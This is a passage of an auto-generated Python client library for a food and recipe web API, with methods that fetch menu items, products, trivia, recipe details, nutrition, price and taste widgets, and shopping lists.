"""Get Menu Item Information # noqa: E501
Use a menu item id to get all available information about a menu item, such as nutrition. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_menu_item_information(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The menu item id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_menu_item_information_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_menu_item_information_with_http_info(id, **kwargs) # noqa: E501
return data
def get_menu_item_information_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Menu Item Information # noqa: E501
Use a menu item id to get all available information about a menu item, such as nutrition. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_menu_item_information_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The menu item id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_menu_item_information" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_menu_item_information`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/menuItems/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_product_information(self, id, **kwargs): # noqa: E501
"""Get Product Information # noqa: E501
Use a product id to get full information about a product, such as ingredients, nutrition, etc. The nutritional information is per serving. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_product_information(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The id of the packaged food. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_product_information_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_product_information_with_http_info(id, **kwargs) # noqa: E501
return data
def get_product_information_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Product Information # noqa: E501
Use a product id to get full information about a product, such as ingredients, nutrition, etc. The nutritional information is per serving. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_product_information_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The id of the packaged food. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_product_information" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_product_information`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/products/{id}', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_random_food_trivia(self, **kwargs): # noqa: E501
"""Get Random Food Trivia # noqa: E501
Returns random food trivia. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_random_food_trivia(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_random_food_trivia_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_random_food_trivia_with_http_info(**kwargs) # noqa: E501
return data
def get_random_food_trivia_with_http_info(self, **kwargs): # noqa: E501
"""Get Random Food Trivia # noqa: E501
Returns random food trivia. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_random_food_trivia_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = [] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_random_food_trivia" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/food/trivia/random', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_random_recipes(self, **kwargs): # noqa: E501
"""Get Random Recipes # noqa: E501
Find random (popular) recipes. If you need to filter recipes by diet, nutrition etc. you might want to consider using the complex recipe search endpoint and set the sort request parameter to random. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_random_recipes(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
:param str tags: The tags (can be diets, meal types, cuisines, or intolerances) that the recipe must have.
:param float number: The number of random recipes to be returned (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_random_recipes_with_http_info(**kwargs) # noqa: E501
else:
(data) = self.get_random_recipes_with_http_info(**kwargs) # noqa: E501
return data
def get_random_recipes_with_http_info(self, **kwargs): # noqa: E501
"""Get Random Recipes # noqa: E501
Find random (popular) recipes. If you need to filter recipes by diet, nutrition etc. you might want to consider using the complex recipe search endpoint and set the sort request parameter to random. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_random_recipes_with_http_info(async_req=True)
>>> result = thread.get()
:param async_req bool
:param bool limit_license: Whether the recipes should have an open license that allows display with proper attribution.
:param str tags: The tags (can be diets, meal types, cuisines, or intolerances) that the recipe must have.
:param float number: The number of random recipes to be returned (between 1 and 100).
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['limit_license', 'tags', 'number'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_random_recipes" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
collection_formats = {}
path_params = {}
query_params = []
if 'limit_license' in local_var_params:
query_params.append(('limitLicense', local_var_params['limit_license'])) # noqa: E501
if 'tags' in local_var_params:
query_params.append(('tags', local_var_params['tags'])) # noqa: E501
if 'number' in local_var_params:
query_params.append(('number', local_var_params['number'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/random', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_recipe_equipment_by_id(self, id, **kwargs): # noqa: E501
"""Get Recipe Equipment by ID # noqa: E501
Get a recipe's equipment list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_equipment_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_recipe_equipment_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_recipe_equipment_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_recipe_equipment_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Recipe Equipment by ID # noqa: E501
Get a recipe's equipment list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_equipment_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_recipe_equipment_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_recipe_equipment_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/equipmentWidget.json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_recipe_information(self, id, **kwargs): # noqa: E501
"""Get Recipe Information # noqa: E501
Use a recipe id to get full information about a recipe, such as ingredients, nutrition, diet and allergen information, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_information(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The id of the recipe. (required)
:param bool include_nutrition: Include nutrition data in the recipe information. Nutrition data is per serving. If you want the nutrition data for the entire recipe, just multiply by the number of servings.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_recipe_information_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_recipe_information_with_http_info(id, **kwargs) # noqa: E501
return data
def get_recipe_information_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Recipe Information # noqa: E501
Use a recipe id to get full information about a recipe, such as ingredients, nutrition, diet and allergen information, etc. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_information_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The id of the recipe. (required)
:param bool include_nutrition: Include nutrition data in the recipe information. Nutrition data is per serving. If you want the nutrition data for the entire recipe, just multiply by the number of servings.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id', 'include_nutrition'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_recipe_information" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_recipe_information`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
if 'include_nutrition' in local_var_params:
query_params.append(('includeNutrition', local_var_params['include_nutrition'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/information', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_recipe_information_bulk(self, ids, **kwargs): # noqa: E501
"""Get Recipe Information Bulk # noqa: E501
Get information about multiple recipes at once. This is equivalent to calling the Get Recipe Information endpoint multiple times, but faster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_information_bulk(ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ids: A comma-separated list of recipe ids. (required)
:param bool include_nutrition: Include nutrition data to the recipe information. Nutrition data is per serving. If you want the nutrition data for the entire recipe, just multiply by the number of servings.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_recipe_information_bulk_with_http_info(ids, **kwargs) # noqa: E501
else:
(data) = self.get_recipe_information_bulk_with_http_info(ids, **kwargs) # noqa: E501
return data
def get_recipe_information_bulk_with_http_info(self, ids, **kwargs): # noqa: E501
"""Get Recipe Information Bulk # noqa: E501
Get information about multiple recipes at once. This is equivalent to calling the Get Recipe Information endpoint multiple times, but faster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_information_bulk_with_http_info(ids, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ids: A comma-separated list of recipe ids. (required)
:param bool include_nutrition: Include nutrition data to the recipe information. Nutrition data is per serving. If you want the nutrition data for the entire recipe, just multiply by the number of servings.
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['ids', 'include_nutrition'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_recipe_information_bulk" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'ids' is set
if ('ids' not in local_var_params or
local_var_params['ids'] is None):
raise ApiValueError("Missing the required parameter `ids` when calling `get_recipe_information_bulk`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
if 'ids' in local_var_params:
query_params.append(('ids', local_var_params['ids'])) # noqa: E501
if 'include_nutrition' in local_var_params:
query_params.append(('includeNutrition', local_var_params['include_nutrition'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/informationBulk', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_recipe_ingredients_by_id(self, id, **kwargs): # noqa: E501
"""Get Recipe Ingredients by ID # noqa: E501
Get a recipe's ingredient list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_ingredients_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_recipe_ingredients_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_recipe_ingredients_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_recipe_ingredients_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Recipe Ingredients by ID # noqa: E501
Get a recipe's ingredient list. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_ingredients_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_recipe_ingredients_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_recipe_ingredients_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/ingredientWidget.json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_recipe_nutrition_widget_by_id(self, id, **kwargs): # noqa: E501
"""Get Recipe Nutrition Widget by ID # noqa: E501
Get a recipe's nutrition widget data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_nutrition_widget_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_recipe_nutrition_widget_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_recipe_nutrition_widget_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_recipe_nutrition_widget_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Recipe Nutrition Widget by ID # noqa: E501
Get a recipe's nutrition widget data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_nutrition_widget_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_recipe_nutrition_widget_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_recipe_nutrition_widget_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/nutritionWidget.json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_recipe_price_breakdown_by_id(self, id, **kwargs): # noqa: E501
"""Get Recipe Price Breakdown by ID # noqa: E501
Get a recipe's price breakdown data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_price_breakdown_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_recipe_price_breakdown_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_recipe_price_breakdown_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_recipe_price_breakdown_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Recipe Price Breakdown by ID # noqa: E501
Get a recipe's price breakdown data. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_price_breakdown_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_recipe_price_breakdown_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_recipe_price_breakdown_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/priceBreakdownWidget.json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_recipe_taste_by_id(self, id, **kwargs): # noqa: E501
"""Get Recipe Taste by ID # noqa: E501
Get a recipe's taste. The tastes supported are sweet, salty, sour, bitter, savory, and fatty. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_taste_by_id(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_recipe_taste_by_id_with_http_info(id, **kwargs) # noqa: E501
else:
(data) = self.get_recipe_taste_by_id_with_http_info(id, **kwargs) # noqa: E501
return data
def get_recipe_taste_by_id_with_http_info(self, id, **kwargs): # noqa: E501
"""Get Recipe Taste by ID # noqa: E501
Get a recipe's taste. The tastes supported are sweet, salty, sour, bitter, savory, and fatty. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_recipe_taste_by_id_with_http_info(id, async_req=True)
>>> result = thread.get()
:param async_req bool
:param float id: The recipe id. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['id'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_recipe_taste_by_id" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'id' is set
if ('id' not in local_var_params or
local_var_params['id'] is None):
raise ApiValueError("Missing the required parameter `id` when calling `get_recipe_taste_by_id`") # noqa: E501
collection_formats = {}
path_params = {}
if 'id' in local_var_params:
path_params['id'] = local_var_params['id'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['apiKeyScheme'] # noqa: E501
return self.api_client.call_api(
'/recipes/{id}/tasteWidget.json', 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='object', # noqa: E501
auth_settings=auth_settings,
async_req=local_var_params.get('async_req'),
_return_http_data_only=local_var_params.get('_return_http_data_only'), # noqa: E501
_preload_content=local_var_params.get('_preload_content', True),
_request_timeout=local_var_params.get('_request_timeout'),
collection_formats=collection_formats)
def get_shopping_list(self, username, hash, **kwargs): # noqa: E501
"""Get Shopping List # noqa: E501
Get the current shopping list for the given user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_shopping_list(username, hash, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str hash: The private hash for the username. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.get_shopping_list_with_http_info(username, hash, **kwargs) # noqa: E501
else:
(data) = self.get_shopping_list_with_http_info(username, hash, **kwargs) # noqa: E501
return data
def get_shopping_list_with_http_info(self, username, hash, **kwargs): # noqa: E501
"""Get Shopping List # noqa: E501
Get the current shopping list for the given user. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.get_shopping_list_with_http_info(username, hash, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str username: The username. (required)
:param str hash: The private hash for the username. (required)
:return: object
If the method is called asynchronously,
returns the request thread.
"""
local_var_params = locals()
all_params = ['username', 'hash'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
for key, val in six.iteritems(local_var_params['kwargs']):
if key not in all_params:
raise ApiTypeError(
"Got an unexpected keyword argument '%s'"
" to method get_shopping_list" % key
)
local_var_params[key] = val
del local_var_params['kwargs']
# verify the required parameter 'username' is set
if ('username' not in local_var_params or
local_var_params['username'] is None):
raise ApiValueError("Missing the required parameter `username` when calling `get_shopping_list`") # noqa: E501
# verify the required parameter 'hash' is set
if ('hash' not in local_var_params or
local_var_params['hash'] is None):
raise ApiValueError("Missing the required parameter `hash` when calling `get_shopping_list`") # noqa: E501
collection_formats = {}
path_params = {}
if 'username' in local_var_params:
path_params['username'] = local_var_params['username'] # noqa: E501
query_params = []
if 'hash' in local_var_params:
query_params.append(('hash', local_var_params['hash'])) # noqa: E501
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
